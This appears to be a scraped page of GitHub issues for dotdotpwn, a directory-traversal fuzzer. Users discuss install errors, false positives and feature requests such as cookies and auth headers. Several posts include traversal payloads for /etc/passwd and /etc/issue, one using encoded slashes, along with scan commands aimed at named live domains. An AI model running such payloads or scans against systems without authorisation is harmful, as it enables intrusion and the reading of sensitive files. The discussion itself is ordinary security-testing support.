wireghoul / dotdotpwn Goto Github PK

Hi,

I've ran dotdotpwn v3.0.2 against a web application that has reported 304 traversals.

I ran the following command:

./dotdotpwn.pl -m http -h xxxxxxxx -S -k "root"

All of the vulnerable traversals have a "?" in them, not sure if that is relevant. An example is:

[*] Testing Path (response analysis): https://xxxxxxxxxxx:443/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue <- VULNERABLE!

But when I enter that URL into Chrome it comes back as 403 forbidden.

If it helps the server is running nginx v1.11.3

Thanks for your help!

Hey,
There's no flag to use cookies.. that makes that tool less useful from my presepection.
Would be nice to have one

Net::FTP is up to date (3.08).
TFTP is up to date (1).
Time::HiRes is up to date (1.9739).
Socket is up to date (2.021).
IO::Socket is up to date (1.31).
Getopt::Std is up to date (1.11).
Switch is up to date (2.17).

How can I give a user:password@host combination for a host that requires basic auth? Alternatively, can I set a header to produce the same result?

The software outputs hundres of vulnerable urls but they are actually redirected to home page of the website, which is not vulnerable.

after installed the perl module in mint distro

causes the error below

Can not locate TFTP.pm in @inc (you may need to install the TFTP module) (@inc contains:. / Etc / perl /usr/local/lib/perl/5.18.2 / usr / local / share / perl /5.18.2 / usr / lib / perl5 / usr / share / perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 / usr / local / lib / site_perl) at DotDotPwn / TFTP.pm line 13.

Solution
the line of code use TFTP;
you must place the following line because the module is in 'Net'
use Net ::TFTP; # / Usr / share / perl5 / Net / TFTP.pm

Currently the http-url and http modules are requiring a pattern passed via the -k parameter like -k "root:"

It would make sense to use sane defaults for each tested file like:

/etc/passwd -> root:
/etc/hosts -> localhost
boot.ini -> [boot loader]

and just make -k optional where people can overwrite the tested pattern.

Hello!

Could you please help me resolve the issue that I am having when trying to dotdotpwn my website? I downloaded the most recent version of dotdotpwn yesterday to my Kali Linux VM. I have been trying various commands, the latest being:
./dotdotpwn.pl -m http -h all-around-audit-solutions.com -M GET
The response that I keep receiving is:
Web server (all-around-audit-solutions.com) didn't respond !
Could this be because the website is hosted on a GoDaddy server?

Thank you very much for your time and best regards! BTW, I am impressed with your tool as I was able to run it against other domains.

Hi,

for some scenarios it could be useful to set a single deepnes or a deepness range to the traversal pattern. For example if we know that the traversal is in this url:

http://example.com/foo/bar/foo/bar/foo.php?=TRAVERSAL

it doesn't make any sense when testing for /etc/passwd to traversal like:

http://example.com/foo/bar/foo/bar/foo.php?=../../etc/passwd

The minimum traversal deepnes should be 4 in this case which could speed up the testing a lot as the deepnes of 1 to 3 probably won't get any results. Any opinions to this?

Hi there,

i installed the latest version of dotdotpwn on my windows, and its modules including Net::FTP, TFTP, Time::Hires, Socket, IO::Socket, Getopt::Std, Switch. When I executed dotdotpwn.pl and pressed Ctrl+C to terminate the test, it tells me Report saved: Reports/TEST_URL_05-28-2016_09-13.txt.

Why can't i find the report folder?

Please help, thanks

While trying to install dotdotpwn in a docker image, I noticed the following at run time when executing dotdotpwn

Cannot open User-Agents.txt file: No such file or directory at /usr/lib/perl5/vendor_perl/DotDotPwn/HTTP_Url.pm 

dotdotpwn was installed that way

cp -r dotdotpwn-3.0.2/DotDotPwn/ /usr/lib/perl5/vendor_perl
cp dotdotpwn-3.0.2/dotdotpwn.pl /usr/bin/dotdotpwn

Libraries are found from /usr/lib/perl5/vendor_perl, no problem, but this specific resource (User-Agents.txt) cannot be found by HTTP_Url.pm even-though it is right next to it

bash-5.0# ls /usr/lib/perl5/vendor_perl/DotDotPwn/
BisectionAlgorithm.pm  File.pm                HTTP.pm                Payload.pm             TFTP.pm                User-Agents.txt
FTP.pm                 Fingerprint.pm         HTTP_Url.pm            STDOUT.pm              TraversalEngine.pm

I do not know how relative path is handled by pearl but I wondered if my current problem had anything to do with this specific line

It might sound naive but, from the standpoint of HTTP_Url.pm , isn't User-Agents.txt supposed to be at ./User-Agents.txt instead of DotDotPwn/User-Agents.txt?

I am a complete noob with pearl so I am open to any cleaner way to install this tool system wide

Hi there! Great tool!

I try to run it by using:

$ ./dotdotpwn.pl -m http-url -u "http://amazon.de:80/TRAVERSAL" -o unix -k "root:" 
...
[+] Report name: Reports/amazon.de_08-27-2014_13-26.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: amazon.de
[+] Setting Operating System type to "unix"
[+] Protocol: http
[+] Port: 80

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 10560

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending

[+] Fuzz testing finished after 0.02 minutes (1 seconds)
[+] Total Traversals found (so far): 0
[-] Web server didn't respond !

Web server didn't respond. But the host is obviously online. What am I doing wrong?

Thx in advance,

Victor

what is the right way to combine multiple key words to search in the files, Is it like :

dotdotpwn -m http-url -u https://www.site/TRAVERSAL -k 'root:' 'secret' (space between words)

or

dotdotpwn -m http-url -u https://www.site/TRAVERSAL -k 'root:', 'secret' ( comma between words)

Hello, could you update to the Perl v5.14.2
i get this error

Can't locate TFTP.pm in @inc (@inc contains: . /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl) at DotDotPwn/TFTP.pm line 13.
BEGIN failed--compilation aborted at DotDotPwn/TFTP.pm line 13.
Compilation failed in require at DotDotPwn/BisectionAlgorithm.pm line 36.
BEGIN failed--compilation aborted at DotDotPwn/BisectionAlgorithm.pm line 36.
Compilation failed in require at DotDotPwn/HTTP.pm line 11.
BEGIN failed--compilation aborted at DotDotPwn/HTTP.pm line 11.
Compilation failed in require at ./dotdotpwn.pl line 59.
BEGIN failed--compilation aborted at ./dotdotpwn.pl line 59.

If I use -x $InsertPortNumberHere, in the banner before it runs it shows "Port: 443". When I omit the -x option, it then display the default port for the module selected. I've only tested this with the http module so far.

Hi,

there seems to be a typo in the help banner

(use https:// for in url for http-url)

https://github.com/wireghoul/dotdotpwn/blob/master/dotdotpwn.pl#L112

I don't know exactly what the sentence should be so just creating an issue and no pull request.

is there any option to increase the speed of the tool?
thanks in advance

Will there be HTTPS module in future? Now it is not supported.

I would like to add an authorization header to requests in "http-url" module, maybe somewhat like with curl - curl -H "authorization: Bearer ...":

dotdotpwn -m http-url -u https://example.com/foo?bar=TRAVERSAL -k "root:" -H "authorization: Bearer ..."

Is this feature in place? If so, I guess it needs to be better documented, otherwise I suggest implementing such feature.

Ie, if / has to be encoded as %2f the traversal should use ..%2f..%2f..%2fetc%2fpasswd not ..%2f..%2f../etc/passwd

Hi! First of all, congratulations for the great App.

I would like to report a behavior I believe will help many users. In the HTTP_url.PM, the code dictates the app should terminate in case of a ping failure:

if(!$ping){
die "[-] Web server didn't respond !\n";

I was testing a windows box where firewall would not allow ping, and modifying the code allowed me to proceed with the test.

While by design, modifying the message to mention 'ping failure' as the cause would narrow down the issue for users.

Continue with your great projects! :)

Does this tool support adding custom cookies and request headers?